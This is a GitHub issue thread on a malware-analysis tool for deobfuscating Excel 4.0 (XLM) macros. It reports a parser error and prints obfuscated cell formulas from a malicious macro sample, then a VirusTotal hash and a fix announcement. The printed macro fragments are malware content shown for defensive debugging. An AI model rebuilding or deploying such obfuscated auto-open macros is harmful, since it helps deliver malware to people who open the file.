search

DissectMalware / XLMMacroDeobfuscator

Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
Apache License 2.0
570 stars 115 forks source link

Unexpected token Token('__ANON_0' #101

Closed seanthegeek closed 2 years ago

seanthegeek commented 2 years ago

Deobfiscating the fallowing malicious macro fails

auto_open: auto_open->GERGEGSFWG!$F$1
SHEET: GERGEGSFWG, macrosheet
CELL:F9, =FORMULA(Vuk1!C17, Vuk2!C14)=FORMULA(Vuk2!G8, Vuk3!D13)=FORMULA(Vuk3!I5, Vuk4!G7)=FORMULA(Vuk4!B13, Vuk5!E2)=FORMULA(Vuk5!D19, Vuk6!B13)=FORMULA(Vuk6!I4, Vuk7!F8)=FORMULA(Vuk7!B14, Vuk1!F2)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!D6&Vuk7!F8&Sssssbvr1!B15&Vuk7!F8&Sssssbvr1!F11&Vuk7!F8&Sssssbvr1!H3&Vuk7!F8&Sssssbvr1!J8&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!F24&Sssssbvr1!R14, F15)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!C12&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&Sssssbvr1!T18, F17)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!L5&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&Sssssbvr1!T18, F19)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!S2&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&Sssssbvr1!T18, F21)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&CCwdbuk1!L31, F23)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&CCwdbuk1!L31, F25)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&CCwdbuk1!L31, F27)=FORMULA(Vuk2!C14&CCwdbuk1!E36&CCwdbuk1!C38&CCwdbuk1!C32&CCwdbuk1!F31&CCwdbuk1!E36&CCwdbuk1!E42&CCwdbuk1!L30&CCwdbuk1!L31, F30), False
SHEET: Vuk1, macrosheet
CELL:C17, =CHAR(CCwdbuk1!C54), =
SHEET: Vuk2, macrosheet
CELL:G8, =CHAR(CCwdbuk1!E49), A
SHEET: Vuk3, macrosheet
CELL:I5, =CHAR(CCwdbuk1!H48), L
SHEET: Vuk4, macrosheet
CELL:B13, =CHAR(CCwdbuk1!L52), e
SHEET: Vuk5, macrosheet
CELL:D19, =CHAR(CCwdbuk1!P50), C
SHEET: Vuk6, macrosheet
CELL:I4, =CHAR(CCwdbuk1!Q55), r
SHEET: Vuk7, macrosheet
CELL:B14, =CHAR(CCwdbuk1!B48), o
auto_open: auto_open->GERGEGSFWG!$F$1
[Starting Deobfuscation]
Error [deobfuscator.py:2580 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('__ANON_0', 'CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!F24&Sssssbvr1!R14, F15)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!C12&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&Sssssbvr1!T18, F17)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!L5&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&Sssssbvr1!T18, F19)=FORMULA(Vuk2!C14&Vuk6!B13&Vuk3!D13&Vuk4!G7&Vuk4!G7&Sssssbvr1!B2&Vuk7!F8&Sssssbvr1!E5&Sssssbvr1!G16&Vuk1!F2&Sssssbvr1!C20&Vuk5!E2&Sssssbvr1!O11&Vuk6!B13&Vuk6!B13&Sssssbvr2!S2&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&Sssssbvr1!T18, F21)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!N4&CCwdbuk1!L31, F23)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!C10&CCwdbuk1!L31, F25)=FORMULA(Vuk2!C14&CCwdbuk1!C38&CCwdbuk1!F4&CCwdbuk1!C38&CCwdbuk1!O3&Sssssbvr2!O10&Vuk7!F8&Sssssbvr2!K15&Vuk7!F8&Sssssbvr2!R14&Vuk6!B13&CCwdbuk1!H24&Sssssbvr1!L1&CCwdbuk1!H26&Sssssbvr1!Q2&CCwdbuk1!L31, F27)=FORMULA(Vuk2!C14&CCwdbuk1!E36&CCwdbuk1!C38&CCwdbuk1!C32&CCwdbuk1!F31&CCwdbuk1!E36&CCwdbuk1!E42&CCwdbuk1!L30&CCwdbuk1!L31, F30)') at line 1, column 350.
Expected one of: 
        * QUOTE
        * EXCLAMATION
        * NUMBER
        * LBRACE
        * L_PRA
        * ERROR
        * BOOLEAN
        * ROW
        * /\$?([a-qs-z][a-z]?)\$?\d+\b|\$?(r[a-bd-z]?)\$?\d+\b(?!C)/i
        * NAME
        * STRING
Previous tokens: [Token('CONCATOP', '&')]

Files:

[END of Deobfuscation]
DissectMalware commented 2 years ago

Please share the sample or if it is on VT, its hash so I can test it. You can reach me directly via DM on Twitter, if you do not want to share the info here.

seanthegeek commented 2 years ago

https://www.virustotal.com/gui/file/714469E1B0F10CE91DD8104A064A85586E29803B780C4F6AF829745B9BBD38B1

DissectMalware commented 2 years ago

the issue is fixed in v2.3.4

image